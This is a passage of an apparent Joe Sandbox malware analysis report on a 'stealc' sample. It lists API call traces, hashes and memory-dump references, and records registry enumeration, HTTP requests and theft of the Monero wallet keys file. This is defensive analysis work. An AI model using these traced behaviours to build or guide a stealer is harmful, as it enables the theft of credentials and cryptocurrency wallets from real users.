                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                                                                                                                                            • String ID: "$"$------$------$------
                                                                                                                                                                            • API String ID: 2402878923-2180234286
                                                                                                                                                                            • Opcode ID: c9ea82500eb8518222e762d7aca16dc18be209dd64fffba995d713fb32a7ef26
                                                                                                                                                                            • Instruction ID: 57d219535df4cdd6d127884bfa4e52b003a05f81de2ad89ebbdb2b52031bd1f6
                                                                                                                                                                            • Opcode Fuzzy Hash: c9ea82500eb8518222e762d7aca16dc18be209dd64fffba995d713fb32a7ef26
                                                                                                                                                                            • Instruction Fuzzy Hash: 7B12AB71950118EAEB15FB90DD9AFEEB379AF14300F5041AAB10662491EF7C3F49CB62
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(00000000,00CFDBC0,00000000,00020019,00000000,007905B6), ref: 007883A4
                                                                                                                                                                            • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00788426
                                                                                                                                                                            • wsprintfA.USER32 ref: 00788459
                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0078847B
                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0078848C
                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00788499
                                                                                                                                                                              • Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseOpenlstrcpy$Enumwsprintf
                                                                                                                                                                            • String ID: - $%s\%s$?
                                                                                                                                                                            • API String ID: 3246050789-3278919252
                                                                                                                                                                            • Opcode ID: f09a53b43af3c126e9b837f64f32af9b8453a6094e4b9c2ec45b2dd6b76ae828
                                                                                                                                                                            • Instruction ID: 61aca7a25780751237075f3b0cd5fc2294bad9fb78b6daaddb68ebb4c2bf6693
                                                                                                                                                                            • Opcode Fuzzy Hash: f09a53b43af3c126e9b837f64f32af9b8453a6094e4b9c2ec45b2dd6b76ae828
                                                                                                                                                                            • Instruction Fuzzy Hash: E2812EB1954118EBEB24EB50CD95FEAB7B8FF08710F4082D9E109A6140DF796B85CFA1
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6
                                                                                                                                                                              • Part of subcall function 007747B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007747EA
                                                                                                                                                                              • Part of subcall function 007747B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00774801
                                                                                                                                                                              • Part of subcall function 007747B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00774818
                                                                                                                                                                              • Part of subcall function 007747B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00774839
                                                                                                                                                                              • Part of subcall function 007747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00774849
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                            • InternetOpenA.WININET(00790DFE,00000001,00000000,00000000,00000000), ref: 007762E1
                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00CFD998), ref: 00776303
                                                                                                                                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00776335
                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,GET,?,00D00ED8,00000000,00000000,00400100,00000000), ref: 00776385
                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007763BF
                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007763D1
                                                                                                                                                                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 007763FD
                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0077646D
                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 007764EF
                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 007764F9
                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00776503
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                                                                                                                            • String ID: ERROR$ERROR$GET
                                                                                                                                                                            • API String ID: 3074848878-2509457195
                                                                                                                                                                            • Opcode ID: bf67aafd48645b68f778c65cd954332b7445c0f24d01e397d1802aed6951052c
                                                                                                                                                                            • Instruction ID: 3600309f3b60d16f3aaf24ffe660d0cc02eb260d070ca4e22ca6be17c93013ae
                                                                                                                                                                            • Opcode Fuzzy Hash: bf67aafd48645b68f778c65cd954332b7445c0f24d01e397d1802aed6951052c
                                                                                                                                                                            • Instruction Fuzzy Hash: B2715F71A50218EBEF24EFA0DC49BEE77B8FB44700F108199F1096B194DBB86A85DF51
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0078A820: lstrlenA.KERNEL32(00000000,?,?,00785B54,00790ADB,00790ADA,?,?,00786B16,00000000,?,00CF1620,?,0079110C,?,00000000), ref: 0078A82B
                                                                                                                                                                              • Part of subcall function 0078A820: lstrcpy.KERNEL32(y,00000000), ref: 0078A885
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00785644
                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007856A1
                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00785857
                                                                                                                                                                              • Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6
                                                                                                                                                                              • Part of subcall function 007851F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00785228
                                                                                                                                                                              • Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905
                                                                                                                                                                              • Part of subcall function 007852C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00785318
                                                                                                                                                                              • Part of subcall function 007852C0: lstrlenA.KERNEL32(00000000), ref: 0078532F
                                                                                                                                                                              • Part of subcall function 007852C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00785364
                                                                                                                                                                              • Part of subcall function 007852C0: lstrlenA.KERNEL32(00000000), ref: 00785383
                                                                                                                                                                              • Part of subcall function 007852C0: strtok.MSVCRT(00000000,?), ref: 0078539E
                                                                                                                                                                              • Part of subcall function 007852C0: lstrlenA.KERNEL32(00000000), ref: 007853AE
                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0078578B
                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00785940
                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00785A0C
                                                                                                                                                                            • Sleep.KERNEL32(0000EA60), ref: 00785A1B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcpylstrlen$Sleepstrtok
                                                                                                                                                                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                            • API String ID: 3630751533-2791005934
                                                                                                                                                                            • Opcode ID: cf5effa7f67f657a7602aed6f6e8a43843c9fb8d76b9ed5750ec2247f476b65b
                                                                                                                                                                            • Instruction ID: 2c988a64109b48f3473e0d542b6b2011341702700bcee9339282ccfea9d96179
                                                                                                                                                                            • Opcode Fuzzy Hash: cf5effa7f67f657a7602aed6f6e8a43843c9fb8d76b9ed5750ec2247f476b65b
                                                                                                                                                                            • Instruction Fuzzy Hash: 5AE13F71950108EADB19FBB0DD9AEFD7378AF54300F908129B50666191EF3C6F09DBA2
                                                                                                                                                                            APIs
                                                                                                                                                                            • memset.MSVCRT ref: 00771327
                                                                                                                                                                              • Part of subcall function 007712A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 007712B4
                                                                                                                                                                              • Part of subcall function 007712A0: HeapAlloc.KERNEL32(00000000), ref: 007712BB
                                                                                                                                                                              • Part of subcall function 007712A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 007712D7
                                                                                                                                                                              • Part of subcall function 007712A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 007712F5
                                                                                                                                                                              • Part of subcall function 007712A0: RegCloseKey.ADVAPI32(?), ref: 007712FF
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0077134F
                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0077135C
                                                                                                                                                                            • lstrcatA.KERNEL32(?,.keys), ref: 00771377
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12
                                                                                                                                                                              • Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905
                                                                                                                                                                              • Part of subcall function 00788B60: GetSystemTime.KERNEL32(?,00CF4C38,007905AE,?,?,?,?,?,?,?,?,?,00774963,?,00000014), ref: 00788B86
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982
                                                                                                                                                                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00771465
                                                                                                                                                                              • Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6
                                                                                                                                                                              • Part of subcall function 007799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007799EC
                                                                                                                                                                              • Part of subcall function 007799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00779A11
                                                                                                                                                                              • Part of subcall function 007799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00779A31
                                                                                                                                                                              • Part of subcall function 007799C0: ReadFile.KERNEL32(000000FF,?,00000000,007802E7,00000000), ref: 00779A5A
                                                                                                                                                                              • Part of subcall function 007799C0: LocalFree.KERNEL32(007802E7), ref: 00779A90
                                                                                                                                                                              • Part of subcall function 007799C0: CloseHandle.KERNEL32(000000FF), ref: 00779A9A
                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 007714EF
                                                                                                                                                                            • memset.MSVCRT ref: 00771516
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                                                                                                                                                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                                                                                                            • API String ID: 1930502592-218353709
                                                                                                                                                                            • Opcode ID: 3176c94585bf32bf92ab4b8a2a6690c7c8376a48532c66cb7a49e75373f892e3
                                                                                                                                                                            • Instruction ID: ba0f5ebe29eb657e810f971805e000409c5468d64fc5c32d8d22c9263d00501b
                                                                                                                                                                            • Opcode Fuzzy Hash: 3176c94585bf32bf92ab4b8a2a6690c7c8376a48532c66cb7a49e75373f892e3
                                                                                                                                                                            • Instruction Fuzzy Hash: 855157B1D50119A7DB15FB60DD99EED737CAF50300F4041E9B60A62081EE3C6B85CFA6
                                                                                                                                                                            APIs
                                                                                                                                                                            • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 007870DE
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,0078730D,007905BD), ref: 0078711C
                                                                                                                                                                            • memset.MSVCRT ref: 0078716A
                                                                                                                                                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 007872BE
                                                                                                                                                                            Strings
                                                                                                                                                                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0078718C
                                                                                                                                                                            • sx, xrefs: 00787111
                                                                                                                                                                            • sx, xrefs: 007872AE, 00787179, 0078717C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
